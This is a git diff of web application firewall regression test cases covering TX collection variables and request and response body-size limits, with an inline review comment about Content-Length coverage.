"200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + 
"Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"20\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"20\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", 
@@ -214,58 +224,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (4/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - 
"\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"15\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"15\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", 
@@ -274,59 +286,61 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie I", - "Cookie2":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie II", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie I", + "Cookie2": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie II", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - 
"Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"40\" \\(Variable: TX:anomaly_score\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"40\" \\(Variable: TX:anomaly_score\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,setvar:tx.critical_anomaly_score=5\"", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:2,setvar:tx.anomaly_score=10\"", diff --git a/test/test-cases/regression/config-body_limits.json b/test/test-cases/regression/config-body_limits.json index 5059f11ae6..e45dfce227 100644 --- a/test/test-cases/regression/config-body_limits.json +++ b/test/test-cases/regression/config-body_limits.json 
@@ -1,106 +1,117 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ +[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ "no need." 
] }, - "expected":{ - "http_code":403 + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction ProcessPartial", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction ProcessPartial", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ "no need." 
] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyLimitAction ProcessPartial", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" - }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Content-Length": "493" + }, + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
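Review bot: Every body-limit case in this hunk now declares a `Content-Length` that is itself above the configured limit: `"8"` against `SecResponseBodyLimit 5`, and `"493"` against the limit of 5 on the POST case. These cases therefore no longer show whether Reject and ProcessPartial act on the bytes actually processed or on the declared length. How the harness uses the header is not visible here, so this is a coverage question rather than a known defect. The `"493"` also cannot be checked against the multipart body, which continues past the end of the hunk. Keeping one Reject and one ProcessPartial case without the header would keep enforcement on the real body size covered. The same applies to the `"Content-Length": "493"` additions in the three following hunks of this file.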
@@ -118,47 +129,49 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":403 + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject - Engine Disabled", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" - }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject - Engine Disabled", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Content-Length": "493" + }, + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -176,47 +189,49 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine Off", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction Reject - Engine Detection Only", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" - }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction Reject - Engine Detection Only", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Content-Length": "493" + }, + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -234,46 +249,48 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecRequestBodyLimitAction Reject", "SecRequestBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyLimitAction ProcessPartial", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2" - }, - "uri":"/?key=value&key=other_value", - "method":"POST", - "body":[ + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyLimitAction ProcessPartial", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Content-Type": "multipart/form-data; boundary=------------------------756b6d74fa1a8ee2", + "Content-Length": "493" + }, + "uri": "/?key=value&key=other_value", + "method": "POST", + "body": [ "--------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", 
@@ -291,146 +308,158 @@ "--------------------------756b6d74fa1a8ee2--" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyLimitAction ProcessPartial", "SecRequestBodyLimit 5" ] }, - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject - Engine Disabled", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject - Engine Disabled", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ "no need." 
] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine Off", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, - { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyLimitAction Reject - Engine Detection Only", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ + { + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyLimitAction Reject - Engine Detection Only", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" + }, + "body": [ "no need." 
] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine DetectionOnly", "SecResponseBodyLimitAction Reject", "SecResponseBodyLimit 5" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - urlencoded, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - urlencoded, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", 
@@ -438,45 +467,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - urlencoded, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - urlencoded, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "41", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2¶m3=value3" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 60", 
@@ -484,46 +514,47 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - json, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - json, limit exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "48", "Content-Type": "application/json" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "{\"param1\":{\"param2\":\"value2\",\"param3\":\"value3\"}}" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 20", 
@@ -532,45 +563,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRequestBodyNoFilesLimit - json, limit not exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "41", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - json, limit not exceeded", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "48", "Content-Type": "application/json" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "{\"param1\":{\"param2\":\"value2\",\"param3\":\"value3\"}}" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRequestBodyNoFilesLimit 80", 
@@ -579,47 +611,48 @@ ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"SecRequestBodyNoFilesLimit - xml, limit exceeded", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "77", + "enabled": 1, + "version_min": 300000, + "title": "SecRequestBodyNoFilesLimit - xml, limit exceeded", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "77", "Content-Type": "application/xml" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "ccceee" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Request body excluding files is bigger than the maximum expected.", - "http_code":400 + "expected": { + "debug_log": "Request body excluding files is bigger than the maximum expected.", + "http_code": 400 }, - "rules":[ + "rules": [ 